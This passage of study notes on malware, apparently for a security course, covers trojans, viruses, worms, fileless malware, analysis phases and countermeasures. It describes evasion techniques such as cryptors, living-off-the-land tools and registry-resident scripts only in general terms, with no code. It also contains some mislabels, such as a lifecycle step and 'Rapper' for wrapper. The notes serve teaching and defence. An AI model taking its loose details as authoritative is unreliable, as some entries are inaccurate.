    • Cryptors: tools or components used to encrypt malicious payloads. The primary purpose of a cryptor is to obfuscate malware to evade detection by antivirus software and other security mechanisms. Cryptors work by transforming the code of the malware into a format that is not recognizable by signature-based detection methods. Once the encrypted payload reaches the target system, the cryptor decrypts it, allowing the malware to execute.
      • Key Differences:
      • Embedded Payload: Droppers contain the payload within themselves, while downloaders fetch the payload from an external location.
      • Network Activity: Downloaders require network access to download the additional malware, whereas droppers do not necessarily need network access to deliver the payload.

  • Types:

    • Remote Access Trojans (RATs)**.
    • Mobile trojans**.
    • IoT botnet trojans**.
    • Banking trojans**.
    • Denial of Service trojans**.
    • Backdoor trojans**.

  • Purpose: trojans are used for a variety of malicious activities, including:

    • Disabling Firewalls/IDS to gain deeper access.
    • Installing More Malware as a prelude to further attacks like ransomware.
    • Establishing Command and Control (C2) communications for remote control.
    • Spying via keystroke logging, camera/audio hijacking, and browsing monitoring.
    • Blackmail/Extortion based on sensitive activities.
    • Storage Theft by using a victim’s device to store malicious data.
    • Destruction via “wipers” that erase data or disable the system.
    • Denial of Service (DoS) attacks or botnet creation.
    • Theft of sensitive data (PII, PHI, financials).

  • Deploy methods:

    • Dropper: Initial benign malware that drops a more malicious payload.
    • Downloader: Malware that downloads the second-stage Trojan from a remote source.
    • Rapper: A program that contains a Trojan hidden within a seemingly harmless application.
    • Cryptor: Malicious code encrypted to evade antivirus detection, which decrypts and executes the code at runtime.

  • Infection methods: trojans are often spread through social engineering tactics, such as:

    • Malicious Links: Emails or websites that trick users into clicking a link or downloading an attachment.
    • Macros: Embedded in documents that, when opened, execute the malicious code.
    • Fake Software: Promises of free software that instead install a Trojan (e.g., fake media player or games).

Viruses and worms

  • Concepts:

    • Virus: malicious software that attaches itself to a host file or program. It is self-replicating but requires human interaction (e.g., clicking on a file) to activate. Once activated, it spreads to other files.
    • Worm: self-replicating malware that spreads independently through software vulnerabilities without requiring human interaction.

  • Goals:

    • Destruction of systems.
    • Cyber theft.
    • Hacktivism.
    • Chaos or “watching the world burn”.

  • Symptoms of infection

    • Poor system performance (e.g., high CPU usage, disk space depletion).
    • Random system crashes.
    • Missing data or deleted files (e.g., documents).

  • Lifecycle:

    1. Design: Virus developers design and build new viruses.
    2. Replication: The virus spreads to new files or systems.
    3. Launch: The virus is executed when a user runs the infected file.
    4. Detection: Security teams discover and analyze the virus.
    5. Incorporation: Antivirus software updates to detect and protect against the new virus.
    6. Execution of Damage Routine: Antivirus software removes the virus.

  • Common types:

    • Boot Sector Viruses: Infect boot sectors of disks. Example: “Elk Cloner.”
    • File-Level Viruses: Spread through infected files. Example: Attachments or programs that carry viruses.
    • Macro Viruses: Exploit application macros (e.g., Excel, Word) to run malicious code.

  • Advanced types:

    • Polymorphic Viruses: Use encryption to change their signature, making them harder to detect (e.g. WannaCry, CryptoLocker).
    • Metamorphic Viruses: Completely rewrite their code, avoiding detection by changing their structure.
    • Logic Bombs: Malicious code that triggers on a specific event or time.
    • Ransomware: A type of virus that encrypts files and demands a ransom to unlock them.

Fileless malware

In simple words, The malicious code being executed is being pushed into a memory space and never touching the disk.

  • Characteristics:

    • No Files on Disk: Operates without leaving files on the hard drive.
    • Memory-Resident: Persists in the system’s RAM.
    • Leverages Legitimate Tools: Uses built-in system tools like PowerShell, WMI (Windows Management Instrumentation), and macros within Office documents.
    • Evades Detection: Bypasses traditional antivirus solutions that scan for malicious files on disk.

  • Attack vectors:

    1. Phishing emails: contain malicious links or attachments that, when opened, execute fileless malware.
    2. Exploiting vulnerabilities: utilizes security flaws in software to execute code directly in memory.
    3. Malicious Macros: embedded in documents (e.g., Word or Excel) that execute scripts when the document is opened.
    4. PowerShell Scripts: PowerShell commands or scripts executed to perform malicious activities.

  • Entry Points for Fileless Malware:

    • Exploits: File-based or fileless payloads.
    • Network-Based: Exploiting remote vulnerabilities (e.g., buffer overflow).
    • Hardware: Malware targeting firmware of devices.
    • Execution and Injection:
      • File-based: Executables used in memory.
      • Macro-based: VBA macros, often in Word/Excel files.
      • Script-based: PowerShell, Bash, Python, etc.
      • Disk-based: Rootkit infections through boot records.

  • Process of infection:

    1. Entry Point: Exploits like EternalBlue, phishing emails, or malicious websites.
    2. Code Execution: Uses scripts (e.g., PowerShell, WMIC) to execute malicious actions.
    3. Persistence: Maintains access via registry entries or scheduled tasks.
    4. Objectives: Data exfiltration, reconnaissance, or cyber espionage.

  • Common tactics: attackers often obfuscate their code by modifying characters or using legitimate processes to avoid detection by security systems. This approach enables fileless malware to execute without leaving traces on disk, making it difficult for traditional security solutions to detect.

  • Classification:

    • By evidence:
      • No file activity performed.
      • Indirect file activity: Using legitimate files which are supposed to be on the system and modifying these files to run some malicious code but still in the memory space.
      • Files required: This file is not malicious and doesn’t raise red flags, but it reaches to the internet, grap a malicious file, and read the content of that file into the memory, so basically nothing malicious is touching the disk.
    • By Entry Points:
      • Exploits & Network-based.
      • Hardware: eg. Spreading through infected USB drives.
      • Execution & Injection (macro based, script based, disk based).

  • Types: fileless malware can be categorized based on the techniques it employs and the components it targets:

    1. Memory-Resident Malware: operates entirely in memory without writing files to the disk (e.g. worms that propagate through network connections and remain in the RAM of infected systems).
    2. Script-Based Malware: uses scripts (e.g., PowerShell, JavaScript, VBScript) to execute malicious activities.
    3. Registry-Resident Malware: stores malicious code or scripts in the Windows Registry for persistence (e.g. writes base64-encoded PowerShell commands to the registry and executes them using regsvr32.exe).
    4. Reflective DLL Injection: injects Dynamic Link Libraries (DLLs) directly into the memory of running processes without writing to disk (e.g. DLL injection).
    5. Living off the Land (LoL) Attacks: exploits legitimate system tools and software to carry out malicious activities (e.g. using wmic.exe, powershell.exe, or mshta.exe to download and execute malicious scripts).
    6. Office Document Macros: embeds malicious macros in Office documents (e.g., Word, Excel) that execute when the document is opened (e.g. Word document with a malicious VBA macro that executes PowerShell commands).
    7. Bootkits: reside in the system’s boot sector or bootloader, often leveraging firmware or system-level exploits (e.g. infect the Master Boot Record (MBR) to load its payload directly into memory during the boot process).
    8. Browser-Based Fileless Malware: executes through web browsers using malicious scripts or exploits delivered via websites (e.g. JavaScript payload).

  • Examples

    1. Poweliks: uses registry keys to store and execute malicious PowerShell scripts.
    2. SamSam* ransomware that exploits vulnerabilities to run in memory and encrypt files.
    3. Kovter: ad-fraud malware that maintains persistence through registry manipulation.
    4. Powersniff: uses malicious PowerShell scripts to download and execute payloads directly in memory.

Malware analysis

  • Phases:

    • Discovery phase:
      1. Initial Detection: malware discovery may be triggered by antivirus (AV), endpoint detection and response (EDR) systems, or user reports of suspicious activity.
      2. Indicators of Infection:
        • Files with strange behavior (e.g., ransomware locking files).
        • AV or IDS/IPS systems detecting unusual activities like command and control (C2) connections.
        • User complaints such as unexpected system behavior or ransom notes.
      3. Sheep Dipping:
        • The process of scanning and disinfecting infected devices (referred to as “cyber sheep”).
        • AV and monitoring systems like network traffic analysis are used to check for suspicious activity.
        • Quarantined devices undergo thorough analysis before being allowed back into the network.
    • Study/Analysis phase:
      1. Static Analysis: this involves analyzing the file without executing it:
        • File Hashing: files are hashed (e.g., using md5sum), and hashes are checked against known virus signatures in services like VirusTotal.
        • File Type Identification: tools like file help identify file formats (e.g., ELF for Linux, PE for Windows).
        • Suspicious Strings: searching for human-readable text strings within the code (e.g., bin sh could indicate a shell process).
        • Obfuscation Detection: malware often obfuscates its code to avoid detection by AV systems.
      2. Dynamic Analysis: involves running the malware to observe its behavior:
        • File System Behavior: what files does it create or modify? Does it delete files or consume system resources (e.g., CPU, memory)?
        • Network Activity: monitoring for any network traffic indicating command and control (C2) communication or data exfiltration.
        • System Calls: tools like S-trace can trace system calls and monitor what resources the malware requests from the operating system.

  • Tools:

  • VirusTotal: popular service for scanning files by their hash against multiple antivirus engines.
  • Hybrid Analysis: similar to VirusTotal, offering insights into file behaviors.
  • S-trace]: useful for tracking system calls during dynamic analysis to detect what resources are being accessed.
  • IDAPRO/Ghidra: reverse engineering tools used for deeper analysis of malware code.
  • Important concepts:
  • Obfuscation: malware may use techniques like Base64 encoding or PowerShell obfuscation to avoid detection.
  • Sandboxing: running malware in an isolated environment is essential to prevent it from affecting real systems. It’s important to use either physical isolation or virtualization to safely analyze potentially dangerous files.

Malware countermeasures

  1. Updates and Patches:
    • Keeping software and systems updated is crucial to defend against malware, as malware often exploits known vulnerabilities.
    • Establish a patch policy with scheduled updates. Neglecting updates increases vulnerability to attacks.
    • Automatic updates can help ensure systems stay secure.
  2. Anti-malware Tools:
    • Use anti-virus, anti-malware, and EDR (Endpoint Detection and Response) solutions to detect and block malicious activity.
    • Windows Security is a built-in tool for virus and threat protection. Ensure real-time protection and regular updates.
  3. User Awareness and Training:
    • Train employees to avoid phishing emails, suspicious links, and unknown attachments. User behavior is a major vector for malware infection.
    • Implement security awareness sessions to help employees identify and handle threats.
  4. Backups:
    • Regular backups are essential to recover from data loss or ransomware attacks.
    • Implement a defined backup schedule, including offsite backups and remote replication.
  5. Logging and Monitoring:
    • Monitor systems using IDS/IPS, file integrity monitors, and network traffic analysis tools (e.g., Wireshark, SolarWinds).
    • Use SIEM systems (e.g., Splunk, AlienVault) to aggregate and analyze logs, enabling quick detection of security incidents.
  6. Blocking Malicious Activity:
    • Block untrusted applications and network connections using whitelisting/blacklisting or firewall rules.
    • Disable unnecessary services (e.g., PowerShell) to minimize attack surfaces.
0%